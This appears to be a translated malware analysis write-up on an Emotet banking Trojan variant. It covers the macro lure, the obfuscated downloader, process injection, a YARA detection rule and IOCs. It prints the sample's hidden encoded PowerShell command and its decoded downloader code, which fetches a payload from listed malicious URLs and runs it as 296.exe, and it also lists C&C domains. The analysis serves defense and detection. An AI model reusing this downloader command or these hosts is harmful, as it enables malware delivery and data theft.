Article Directory
Preface
Emotet is one of the popular banking Trojans nowadays, with many variants and different obfuscators. Emotet is mainly spread by spam, and the macro file in the email is used as a Downloader for subsequent downloads of Emotet for persistent attacks. This article is based on a variant sample obtained in January for analysis.
Sample running process
Sample analysis
Macro document analysis
Open the document, the picture in the document induces the user to click the button to start the macro.
Enter the VBA editor, you can see some of the macros shown in the figure below, all the macro codes have been confused, and the real logic cannot be seen.
Dynamic debugging of the macro code, you can see from the following two figures, the function of the macro code is to start wmi to execute a powersehll script
The powershell script content executes a piece of base64 encrypted code in a hidden way
Powershell -w hidden -en JABTAG8AbgBsAGYAbQB4AGYAZwBsAGcAPQAnAFgAeQB5AHMAbgBrAGkAdQB5AHgAbwAnADsAJABFAGMAegBhAGQAeAB2AGUAYwAgAD0AIAAnADIAOQA2ACcAOwAkAFoAegByAHIAegBlAGIAeQBzAGUAPQAnAFYAcAB5AGIAeAB4AHAAbQBkAGUAeQBkAHEAJwA7ACQATQB3AGIAZwBvAHIAaAByAHkAZgBoAG4AZQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARQBjAHoAYQBkAHgAdgBlAGMAKwAnAC4AZQB4AGUAJwA7ACQAUwB1AHIAegBkAHgAZAB5AGcAcAB0AGgAPQAnAFkAZgB1AGYAbgBwAHMAdwB4AHoAJwA7ACQATAB2AGIAbwBqAG8AbAB4AHYAeABtAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMAbABJAGUATgBUADsAJABGAHYAbwB2AGEAZABzAGgAaAB0AGIAbwA9ACcAaAB0AHQAcAA6AC8ALwBhAGQAeQBrAHUAcgBuAGkAYQB3AGEAbgAuAGMAbwBtAC8AbQBwADMALwAxADgAbwB4ADYAaAAvACoAaAB0AHQAcAA6AC8ALwBtAHkAcABoAGEAbQB0AGgAYQBuAGgAYgBpAG4AaAAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBxAEQAcQAvACoAaAB0AHQAcAA6AC8ALwBzAGYAbQBhAGMALgBiAGkAegAvAGMAYQBsAGUAbgBkAGEAcgAvAEsAMQBhAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbQBqAG0AZQBjAGgAYQBuAGkAYwBhAGwALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAG
After decryption
$Sonlfmxfglg='Xyysnkiuyxo';
$Eczadxvec='296';
$Zzrrzebyse='Vpybxxpmdeydq';
$Mwbgorhryfhne=$env:userprofile+'\'+$Eczadxvec+'.exe';
$Surzdxdygpth='Yfufnpswxz';
$Lvbojolxvxm=.('new-ob'+'j'+'ect')NEt.wEbclIeNT;
$Fvovadshhtbo='http://adykurniawan.com/mp3/18ox6h/*http://myphamthanhbinh.net/wp-content/uploads/qDq/*http://sfmac.biz/calendar/K1a/*http://www.mjmechanical.com/wp-includ
According to the above decrypted code, the powershell script will traverse the above four malicious URLs, and then download the corresponding malicious program and rename it to 296.exe.
Process tree generated after word starts macro
Malicious downloader analysis
The sample will first get the required function address
Get the load base address of the dll through PEB
[External link image transfer failed. The source site may have an anti-hotlinking mechanism. It is recommended to save the image and upload it directly (img-GcTk6yz6-1582849922985) (D:\Project\Virus Analysis\emotet Bank Trojan Analysis\pic\Get dll loading base Address.png)]
Get the function address through the export table, in the middle is the confusion of a long series of SendMessageA calls
Get the data in the resource
Store the data obtained from the resource in the two pieces of memory applied for, and XOR the decryption to get the shellcode
The main function of the shellcode in the first block of memory is to obtain the address of the CryptoAPI function. The second block of memory obtains the addresses of several API functions through HASH, and then applies for the third block of memory and fills in the data. The logic of this program is in the third block. In memory.
Call a function above the third block of memory to store the HASH calculation in the array to the corresponding memory address
The following is the beginning of the entire program
Compare the command line parameters, if the comparison fails, start a process with command line parameters, and then exit the current process
Determine whether the current process path is in the system directory, if it is in anti-hui eax
If not, release the current file to the system directory, create a service, start the process, and return 0
HASH calculates the remote server and downloads the file
Write file and create process
From the analysis here, we can find that this sample is actually a downloader, and the following is the real secret stealing program
Analysis of the theft program
Through the behavior, you can see that after the malicious program runs, the system program is created by thread injection or puppet process technology, and the system process is used to obtain the local data and send it to the remote server.
Looking at the file resource information, it is found that the code format is very similar to the downloader, and it can be judged that the same obfuscator is used to obfuscate the code.
The malicious program uses the same obfuscator, and the previous code execution process is the same. It applies for memory to execute the shellcode, and then decrypts the key logic code in the third memory.
Encrypt and decrypt subsequent data through continuous XOR
Create svchost puppet process
Apply for the entry point of the memory write code hook program
After the entry point executes ret, it will execute to the memory address 0x6100, which is the memory of the svchost process written by the malicious program
Copy the malicious process to the system directory
Get local information
data input
send data
There are other behaviors of subsequent malicious programs, so I won't analyze them one by one here.
yara rule
Since the malicious sample uses an obfuscator, I generally like to add its binary code to the yara rule. As follows, I find the assembly code of the functions obtained in the obfuscator and use them as the characteristics of the malicious program.
(Of course, in practice, many packers will also use this method of obtaining derived functions. If only one feature is added, it may cause false alarms. You can find other features according to your needs.)
rule VirTool_Obfuscator_a
{
meta:
author = "0x17"
samples = "d27590b402b475ae11a93f2976c2de595ab1eac9"
samples = "3d40a6516172d4115be08dd03767526f4b24dce8"
strings:
/*
8B 6C 24 ?? mov ebp, [esp+10h+arg_0]
8B 45 3C mov eax, [ebp+3Ch]
56 push esi
8B 35 ?? ?? ?? ?? mov esi, ds:SendMessageA
57 push edi
8B 7C 28 78 mov edi, [eax+ebp+78h]
8B 5C 2F 1C mov ebx, [edi+ebp+1Ch]
8B 4C 2F 18 mov ecx, [edi+ebp+18h]
6A 00 push 0 ; lParam
03 FD add edi, ebp
6A 02 push 2 ; wParam
6A 06 push 6 ; Msg
03 DD add ebx, ebp
6A 00 push 0 ; hWnd
89 4C 24 ?? mov [esp+28h+arg_0], ecx
89 5C 24 ?? mov [esp+28h+var_8], ebx
FF D6 call esi ; SendMessageA
*/
$hex_string1 = { 8B 6C 24 ?? 8B 45 3C 56 8B 35 ?? ?? ?? ?? 57 8B 7C 28 78 8B 5C 2F 1C 8B 4C 2F 18 6A 00 03 FD 6A 02 6A 06 03 DD 6A 00 89 4C 24 ?? 89 5C 24 ?? FF D6 }
/*
03 48 3C add ecx, [eax+3Ch]
89 4D ?? mov [ebp+var_10], ecx
8B 55 ?? mov edx, [ebp+var_10]
8B 45 ?? mov eax, [ebp+arg_0]
03 42 78 add eax, [edx+78h]
89 45 ?? mov [ebp+var_8], eax
8B 4D ?? mov ecx, [ebp+var_8]
8B 51 18 mov edx, [ecx+18h]
89 55 ?? mov [ebp+var_4], edx
8B 45 ?? mov eax, [ebp+var_8]
8B 4D ?? mov ecx, [ebp+arg_0]
03 48 1C add ecx, [eax+1Ch]
89 4D ?? mov [ebp+var_1C], ecx
*/
$hex_string2 = {03 48 3C 89 4D ?? 8B 55 ?? 8B 45 ?? 03 42 78 89 45 ?? 8B 4D ?? 8B 51 18 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 1C 89 4D ?? }
condition:
1 of them
}
Two records reported by the yara engine
[External link image transfer failed. The source site may have an anti-hotlinking mechanism. It is recommended to save the image and upload it directly (img-dcdMiipv-1582849922996) (D:\Project\Virus Analysis\Emotet Bank Trojan Analysis\pic\yara hit.png )]
IOC
Macro document
SHA1: be9efb37ebba29888e1e6451cc6294bde8c30d04
Malicious downloader
SHA1: d27590b402b475ae11a93f2976c2de595ab1eac9
Stealing program
SHA1:3d40a6516172d4115be08dd03767526f4b24dce8
C&C
adykurniawan.com
myphamthanhbinh.net
mjmechanical.com
100.6.23.40
…